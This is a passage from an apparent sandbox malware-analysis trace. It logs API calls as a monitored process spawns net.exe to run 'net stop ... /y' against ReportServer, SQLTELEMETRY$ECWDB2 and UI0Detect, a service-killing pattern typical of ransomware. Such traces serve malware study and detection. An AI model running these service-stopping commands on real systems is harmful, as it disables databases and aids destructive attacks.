lpUsedDefaultChar=0x0) returned 2 [0202.357] WriteFile (in: hFile=0x26c, lpBuffer=0x306270, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x25fd64, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x25fd64, lpOverlapped=0x0) returned 0 [0202.357] LocalFree (hMem=0x306270) returned 0x0 [0202.357] _ultow (in: _Dest=0xdc1, _Radix=2489748 | out: _Dest=0xdc1) returned="3521" [0202.357] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x48b338, nSize=0x800, Arguments=0x489dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 3521.\r\n") returned 0x34 [0202.358] GetFileType (hFile=0x26c) returned 0x3 [0202.358] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x306270 [0202.358] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 3521.\r\n", cchWideChar=52, lpMultiByteStr=0x306270, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 3521.\r\n", lpUsedDefaultChar=0x0) returned 52 [0202.358] WriteFile (in: hFile=0x26c, lpBuffer=0x306270, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x25fd70, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x25fd70, lpOverlapped=0x0) returned 0 [0202.358] LocalFree (hMem=0x306270) returned 0x0 [0202.358] GetFileType (hFile=0x26c) returned 0x3 [0202.358] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x306270 [0202.358] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x306270, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n0", lpUsedDefaultChar=0x0) returned 2 [0202.358] WriteFile (in: hFile=0x26c, lpBuffer=0x306270, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x25fd70, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x25fd70, lpOverlapped=0x0) returned 0 [0202.358] LocalFree (hMem=0x306270) returned 0x0 [0202.358] NetApiBufferFree (Buffer=0x301c60) returned 0x0 [0202.358] NetApiBufferFree (Buffer=0x301c78) returned 0x0 [0202.359] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop UI0Detect /y" [0202.359] exit (_Code=2) Process: id = "192" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6b0a4000" os_pid = "0xba4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ReportServer /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 365 os_tid = 0x438 Process: id = "193" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x71937000" os_pid = "0x5d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "192" os_parent_pid = "0xba4" cmd_line = "C:\\Windows\\system32\\net1 stop ReportServer /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 366 os_tid = 0x7b0 [0202.489] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fd9c | out: lpSystemTimeAsFileTime=0x26fd9c*(dwLowDateTime=0x41e10040, dwHighDateTime=0x1d57a87)) [0202.489] GetCurrentProcessId () returned 0x5d8 [0202.489] GetCurrentThreadId () returned 0x7b0 [0202.489] GetTickCount () returned 0x116c40b [0202.489] QueryPerformanceCounter (in: lpPerformanceCount=0x26fd94 | out: lpPerformanceCount=0x26fd94*=32277379863) returned 1 [0202.489] GetModuleHandleA (lpModuleName=0x0) returned 0x9d0000 [0202.489] __set_app_type (_Type=0x1) [0202.489] __p__fmode () returned 0x74eb31f4 [0202.490] __p__commode () returned 0x74eb31fc [0202.490] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x9dffe6) returned 0x0 [0202.490] __getmainargs (in: _Argc=0x9e9064, _Argv=0x9e906c, _Env=0x9e9068, _DoWildCard=0, _StartInfo=0x9e9024 | out: _Argc=0x9e9064, _Argv=0x9e906c, _Env=0x9e9068) returned 0 [0202.490] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.490] GetConsoleOutputCP () returned 0x1b5 [0202.490] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x9e9080 | out: lpCPInfo=0x9e9080) returned 1 [0202.490] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.493] sprintf_s (in: _DstBuf=0x26fd54, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0202.493] setlocale (category=0, locale=".437") returned="English_United States.437" [0202.495] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0202.495] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0202.495] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer /y" [0202.495] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26fb20, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0202.495] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x0, Size=0x6c) returned 0x3e3c10 [0202.496] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0202.496] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x26fd24 | out: Buffer=0x26fd24*=0x3e1c70) returned 0x0 [0202.496] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x26fd24 | out: Buffer=0x26fd24*=0x3e1c88) returned 0x0 [0202.496] _fileno (_File=0x74eb2900) returned -2 [0202.496] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0202.496] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0202.496] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0202.496] _wcsicmp (_String1="config", _String2="stop") returned -16 [0202.496] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0202.496] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0202.496] _wcsicmp (_String1="file", _String2="stop") returned -13 [0202.496] _wcsicmp (_String1="files", _String2="stop") returned -13 [0202.496] _wcsicmp (_String1="group", _String2="stop") returned -12 [0202.496] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0202.496] _wcsicmp (_String1="help", _String2="stop") returned -11 [0202.496] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0202.496] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0202.496] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0202.496] _wcsicmp (_String1="session", _String2="stop") returned -15 [0202.496] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0202.496] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0202.496] _wcsicmp (_String1="share", _String2="stop") returned -12 [0202.496] _wcsicmp (_String1="start", _String2="stop") returned -14 [0202.496] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0202.497] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0202.497] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0202.497] _wcsicmp (_String1="accounts", _String2="ReportServer") returned -17 [0202.497] _wcsicmp (_String1="computer", _String2="ReportServer") returned -15 [0202.497] _wcsicmp (_String1="config", _String2="ReportServer") returned -15 [0202.497] _wcsicmp (_String1="continue", _String2="ReportServer") returned -15 [0202.497] _wcsicmp (_String1="cont", _String2="ReportServer") returned -15 [0202.497] _wcsicmp (_String1="file", _String2="ReportServer") returned -12 [0202.497] _wcsicmp (_String1="files", _String2="ReportServer") returned -12 [0202.497] _wcsicmp (_String1="group", _String2="ReportServer") returned -11 [0202.497] _wcsicmp (_String1="groups", _String2="ReportServer") returned -11 [0202.497] _wcsicmp (_String1="help", _String2="ReportServer") returned -10 [0202.497] _wcsicmp (_String1="helpmsg", _String2="ReportServer") returned -10 [0202.497] _wcsicmp (_String1="localgroup", _String2="ReportServer") returned -6 [0202.497] _wcsicmp (_String1="pause", _String2="ReportServer") returned -2 [0202.497] _wcsicmp (_String1="session", _String2="ReportServer") returned 1 [0202.497] _wcsicmp (_String1="sessions", _String2="ReportServer") returned 1 [0202.497] _wcsicmp (_String1="sess", _String2="ReportServer") returned 1 [0202.497] _wcsicmp (_String1="share", _String2="ReportServer") returned 1 [0202.497] _wcsicmp (_String1="start", _String2="ReportServer") returned 1 [0202.497] _wcsicmp (_String1="stats", _String2="ReportServer") returned 1 [0202.497] _wcsicmp (_String1="statistics", _String2="ReportServer") returned 1 [0202.497] _wcsicmp (_String1="stop", _String2="ReportServer") returned 1 [0202.497] _wcsicmp (_String1="time", _String2="ReportServer") returned 2 [0202.497] _wcsicmp (_String1="user", _String2="ReportServer") returned 3 [0202.497] _wcsicmp (_String1="users", _String2="ReportServer") returned 3 [0202.497] _wcsicmp (_String1="msg", _String2="ReportServer") returned -5 [0202.497] _wcsicmp (_String1="messenger", _String2="ReportServer") returned -5 [0202.497] _wcsicmp (_String1="receiver", _String2="ReportServer") returned -13 [0202.497] _wcsicmp (_String1="rcv", _String2="ReportServer") returned -2 [0202.497] _wcsicmp (_String1="netpopup", _String2="ReportServer") returned -4 [0202.497] _wcsicmp (_String1="redirector", _String2="ReportServer") returned -12 [0202.497] _wcsicmp (_String1="redir", _String2="ReportServer") returned -12 [0202.497] _wcsicmp (_String1="rdr", _String2="ReportServer") returned -1 [0202.497] _wcsicmp (_String1="workstation", _String2="ReportServer") returned 5 [0202.497] _wcsicmp (_String1="work", _String2="ReportServer") returned 5 [0202.497] _wcsicmp (_String1="wksta", _String2="ReportServer") returned 5 [0202.498] _wcsicmp (_String1="prdr", _String2="ReportServer") returned -2 [0202.498] _wcsicmp (_String1="devrdr", _String2="ReportServer") returned -14 [0202.498] _wcsicmp (_String1="lanmanworkstation", _String2="ReportServer") returned -6 [0202.498] _wcsicmp (_String1="server", _String2="ReportServer") returned 1 [0202.498] _wcsicmp (_String1="svr", _String2="ReportServer") returned 1 [0202.498] _wcsicmp (_String1="srv", _String2="ReportServer") returned 1 [0202.498] _wcsicmp (_String1="lanmanserver", _String2="ReportServer") returned -6 [0202.498] _wcsicmp (_String1="alerter", _String2="ReportServer") returned -17 [0202.498] _wcsicmp (_String1="netlogon", _String2="ReportServer") returned -4 [0202.498] _wcsupr (in: _String="ReportServer" | out: _String="REPORTSERVER") returned="REPORTSERVER" [0202.498] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3e54d0 [0202.500] GetServiceKeyNameW (in: hSCManager=0x3e54d0, lpDisplayName="REPORTSERVER", lpServiceName=0x9eaaf0, lpcchBuffer=0x26fcc0 | out: lpServiceName="", lpcchBuffer=0x26fcc0) returned 0 [0202.501] _wcsicmp (_String1="msg", _String2="REPORTSERVER") returned -5 [0202.501] _wcsicmp (_String1="messenger", _String2="REPORTSERVER") returned -5 [0202.501] _wcsicmp (_String1="receiver", _String2="REPORTSERVER") returned -13 [0202.501] _wcsicmp (_String1="rcv", _String2="REPORTSERVER") returned -2 [0202.501] _wcsicmp (_String1="redirector", _String2="REPORTSERVER") returned -12 [0202.501] _wcsicmp (_String1="redir", _String2="REPORTSERVER") returned -12 [0202.501] _wcsicmp (_String1="rdr", _String2="REPORTSERVER") returned -1 [0202.501] _wcsicmp (_String1="workstation", _String2="REPORTSERVER") returned 5 [0202.501] _wcsicmp (_String1="work", _String2="REPORTSERVER") returned 5 [0202.501] _wcsicmp (_String1="wksta", _String2="REPORTSERVER") returned 5 [0202.501] _wcsicmp (_String1="prdr", _String2="REPORTSERVER") returned -2 [0202.501] _wcsicmp (_String1="devrdr", _String2="REPORTSERVER") returned -14 [0202.501] _wcsicmp (_String1="lanmanworkstation", _String2="REPORTSERVER") returned -6 [0202.501] _wcsicmp (_String1="server", _String2="REPORTSERVER") returned 1 [0202.501] _wcsicmp (_String1="svr", _String2="REPORTSERVER") returned 1 [0202.501] _wcsicmp (_String1="srv", _String2="REPORTSERVER") returned 1 [0202.501] _wcsicmp (_String1="lanmanserver", _String2="REPORTSERVER") returned -6 [0202.501] _wcsicmp (_String1="alerter", _String2="REPORTSERVER") returned -17 [0202.501] _wcsicmp (_String1="netlogon", _String2="REPORTSERVER") returned -4 [0202.501] NetServiceControl (in: servername=0x0, service="REPORTSERVER", opcode=0x0, arg=0x0, bufptr=0x26fcbc | out: bufptr=0x26fcbc) returned 0x889 [0202.502] wcscpy_s (in: _Destination=0x9ea4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0202.502] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0202.503] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x9eb338, nSize=0x800, Arguments=0x9e9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0202.504] GetFileType (hFile=0x26c) returned 0x3 [0202.504] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x3e4000 [0202.504] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x3e4000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0202.504] WriteFile (in: hFile=0x26c, lpBuffer=0x3e4000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x26fbfc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x26fbfc, lpOverlapped=0x0) returned 0 [0202.504] LocalFree (hMem=0x3e4000) returned 0x0 [0202.504] GetFileType (hFile=0x26c) returned 0x3 [0202.504] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3e62a8 [0202.504] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3e62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n>", lpUsedDefaultChar=0x0) returned 2 [0202.504] WriteFile (in: hFile=0x26c, lpBuffer=0x3e62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26fbfc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x26fbfc, lpOverlapped=0x0) returned 0 [0202.504] LocalFree (hMem=0x3e62a8) returned 0x0 [0202.504] _ultow (in: _Dest=0x889, _Radix=2554924 | out: _Dest=0x889) returned="2185" [0202.504] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x9eb338, nSize=0x800, Arguments=0x9e9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0202.505] GetFileType (hFile=0x26c) returned 0x3 [0202.505] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3e62a8 [0202.505] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3e62a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0202.505] WriteFile (in: hFile=0x26c, lpBuffer=0x3e62a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x26fc08, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x26fc08, lpOverlapped=0x0) returned 0 [0202.505] LocalFree (hMem=0x3e62a8) returned 0x0 [0202.505] GetFileType (hFile=0x26c) returned 0x3 [0202.505] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3e62a8 [0202.505] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3e62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n>", lpUsedDefaultChar=0x0) returned 2 [0202.505] WriteFile (in: hFile=0x26c, lpBuffer=0x3e62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26fc08, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x26fc08, lpOverlapped=0x0) returned 0 [0202.505] LocalFree (hMem=0x3e62a8) returned 0x0 [0202.505] NetApiBufferFree (Buffer=0x3e1c70) returned 0x0 [0202.505] NetApiBufferFree (Buffer=0x3e1c88) returned 0x0 [0202.506] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer /y" [0202.506] exit (_Code=2) Process: id = "194" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4d6a9000" os_pid = "0x310" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLTELEMETRY$ECWDB2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 367 os_tid = 0x64 Process: id = "195" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4d561000" os_pid = "0x4a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "194" os_parent_pid = "0x310" cmd_line = "C:\\Windows\\system32\\net1 stop SQLTELEMETRY$ECWDB2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 368 os_tid = 0x6bc [0202.647] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x13fef8 | out: lpSystemTimeAsFileTime=0x13fef8*(dwLowDateTime=0x41fb2f60, dwHighDateTime=0x1d57a87)) [0202.647] GetCurrentProcessId () returned 0x4a4 [0202.647] GetCurrentThreadId () returned 0x6bc [0202.647] GetTickCount () returned 0x116c4b6 [0202.647] QueryPerformanceCounter (in: lpPerformanceCount=0x13fef0 | out: lpPerformanceCount=0x13fef0*=32293147241) returned 1 [0202.647] GetModuleHandleA (lpModuleName=0x0) returned 0x7f0000 [0202.647] __set_app_type (_Type=0x1) [0202.647] __p__fmode () returned 0x74eb31f4 [0202.647] __p__commode () returned 0x74eb31fc [0202.647] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7fffe6) returned 0x0 [0202.648] __getmainargs (in: _Argc=0x809064, _Argv=0x80906c, _Env=0x809068, _DoWildCard=0, _StartInfo=0x809024 | out: _Argc=0x809064, _Argv=0x80906c, _Env=0x809068) returned 0 [0202.648] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.648] GetConsoleOutputCP () returned 0x1b5 [0202.648] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x809080 | out: lpCPInfo=0x809080) returned 1 [0202.648] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.651] sprintf_s (in: _DstBuf=0x13feb0, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0202.651] setlocale (category=0, locale=".437") returned="English_United States.437" [0202.653] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0202.653] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0202.653] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLTELEMETRY$ECWDB2 /y" [0202.653] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x13fc7c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0202.653] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x7a) returned 0x303c20 [0202.653] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0202.653] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x13fe80 | out: Buffer=0x13fe80*=0x301c80) returned 0x0 [0202.653] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x13fe80 | out: Buffer=0x13fe80*=0x301c98) returned 0x0 [0202.653] _fileno (_File=0x74eb2900) returned -2 [0202.653] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0202.653] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0202.653] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0202.653] _wcsicmp (_String1="config", _String2="stop") returned -16 [0202.653] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0202.654] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0202.654] _wcsicmp (_String1="file", _String2="stop") returned -13 [0202.654] _wcsicmp (_String1="files", _String2="stop") returned -13 [0202.654] _wcsicmp (_String1="group", _String2="stop") returned -12 [0202.654] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0202.654] _wcsicmp (_String1="help", _String2="stop") returned -11 [0202.654] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0202.654] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0202.654] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0202.654] _wcsicmp (_String1="session", _String2="stop") returned -15 [0202.654] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0202.654] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0202.654] _wcsicmp (_String1="share", _String2="stop") returned -12 [0202.654] _wcsicmp (_String1="start", _String2="stop") returned -14 [0202.654] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0202.654] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0202.654] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0202.654] _wcsicmp (_String1="accounts", _String2="SQLTELEMETRY$ECWDB2") returned -18 [0202.654] _wcsicmp (_String1="computer", _String2="SQLTELEMETRY$ECWDB2") returned -16 [0202.654] _wcsicmp (_String1="config", _String2="SQLTELEMETRY$ECWDB2") returned -16 [0202.654] _wcsicmp (_String1="continue", _String2="SQLTELEMETRY$ECWDB2") returned -16 [0202.654] _wcsicmp (_String1="cont", _String2="SQLTELEMETRY$ECWDB2") returned -16 [0202.654] _wcsicmp (_String1="file", _String2="SQLTELEMETRY$ECWDB2") returned -13 [0202.654] _wcsicmp (_String1="files", _String2="SQLTELEMETRY$ECWDB2") returned -13 [0202.654] _wcsicmp (_String1="group", _String2="SQLTELEMETRY$ECWDB2") returned -12 [0202.654] _wcsicmp (_String1="groups", _String2="SQLTELEMETRY$ECWDB2") returned -12 [0202.654] _wcsicmp (_String1="help", _String2="SQLTELEMETRY$ECWDB2") returned -11 [0202.654] _wcsicmp (_String1="helpmsg", _String2="SQLTELEMETRY$ECWDB2") returned -11 [0202.654] _wcsicmp (_String1="localgroup", _String2="SQLTELEMETRY$ECWDB2") returned -7 [0202.654] _wcsicmp (_String1="pause", _String2="SQLTELEMETRY$ECWDB2") returned -3 [0202.654] _wcsicmp (_String1="session", _String2="SQLTELEMETRY$ECWDB2") returned -12 [0202.654] _wcsicmp (_String1="sessions", _String2="SQLTELEMETRY$ECWDB2") returned -12 [0202.654] _wcsicmp (_String1="sess", _String2="SQLTELEMETRY$ECWDB2") returned -12 [0202.654] _wcsicmp (_String1="share", _String2="SQLTELEMETRY$ECWDB2") returned -9 [0202.654] _wcsicmp (_String1="start", _String2="SQLTELEMETRY$ECWDB2") returned 3 [0202.654] _wcsicmp (_String1="stats", _String2="SQLTELEMETRY$ECWDB2") returned 3 [0202.654] _wcsicmp (_String1="statistics", _String2="SQLTELEMETRY$ECWDB2") returned 3 [0202.655] _wcsicmp (_String1="stop", _String2="SQLTELEMETRY$ECWDB2") returned 3 [0202.655] _wcsicmp (_String1="time", _String2="SQLTELEMETRY$ECWDB2") returned 1 [0202.655] _wcsicmp (_String1="user", _String2="SQLTELEMETRY$ECWDB2") returned 2 [0202.655] _wcsicmp (_String1="users", _String2="SQLTELEMETRY$ECWDB2") returned 2 [0202.655] _wcsicmp (_String1="msg", _String2="SQLTELEMETRY$ECWDB2") returned -6 [0202.655] _wcsicmp (_String1="messenger", _String2="SQLTELEMETRY$ECWDB2") returned -6 [0202.655] _wcsicmp (_String1="receiver", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0202.655] _wcsicmp (_String1="rcv", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0202.655] _wcsicmp (_String1="netpopup", _String2="SQLTELEMETRY$ECWDB2") returned -5 [0202.655] _wcsicmp (_String1="redirector", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0202.655] _wcsicmp (_String1="redir", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0202.655] _wcsicmp (_String1="rdr", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0202.655] _wcsicmp (_String1="workstation", _String2="SQLTELEMETRY$ECWDB2") returned 4 [0202.655] _wcsicmp (_String1="work", _String2="SQLTELEMETRY$ECWDB2") returned 4 [0202.655] _wcsicmp (_String1="wksta", _String2="SQLTELEMETRY$ECWDB2") returned 4 [0202.655] _wcsicmp (_String1="prdr", _String2="SQLTELEMETRY$ECWDB2") returned -3 [0202.655] _wcsicmp (_String1="devrdr", _String2="SQLTELEMETRY$ECWDB2") returned -15 [0202.655] _wcsicmp (_String1="lanmanworkstation", _String2="SQLTELEMETRY$ECWDB2") returned -7 [0202.655] _wcsicmp (_String1="server", _String2="SQLTELEMETRY$ECWDB2") returned -12 [0202.655] _wcsicmp (_String1="svr", _String2="SQLTELEMETRY$ECWDB2") returned 5 [0202.655] _wcsicmp (_String1="srv", _String2="SQLTELEMETRY$ECWDB2") returned 1 [0202.655] _wcsicmp (_String1="lanmanserver", _String2="SQLTELEMETRY$ECWDB2") returned -7 [0202.655] _wcsicmp (_String1="alerter", _String2="SQLTELEMETRY$ECWDB2") returned -18 [0202.655] _wcsicmp (_String1="netlogon", _String2="SQLTELEMETRY$ECWDB2") returned -5 [0202.655] _wcsupr (in: _String="SQLTELEMETRY$ECWDB2" | out: _String="SQLTELEMETRY$ECWDB2") returned="SQLTELEMETRY$ECWDB2" [0202.655] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3054f0 [0202.658] GetServiceKeyNameW (in: hSCManager=0x3054f0, lpDisplayName="SQLTELEMETRY$ECWDB2", lpServiceName=0x80aaf0, lpcchBuffer=0x13fe1c | out: lpServiceName="", lpcchBuffer=0x13fe1c) returned 0 [0202.658] _wcsicmp (_String1="msg", _String2="SQLTELEMETRY$ECWDB2") returned -6 [0202.658] _wcsicmp (_String1="messenger", _String2="SQLTELEMETRY$ECWDB2") returned -6 [0202.658] _wcsicmp (_String1="receiver", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0202.658] _wcsicmp (_String1="rcv", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0202.658] _wcsicmp (_String1="redirector", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0202.658] _wcsicmp (_String1="redir", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0202.658] _wcsicmp (_String1="rdr", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0202.658] _wcsicmp (_String1="workstation", 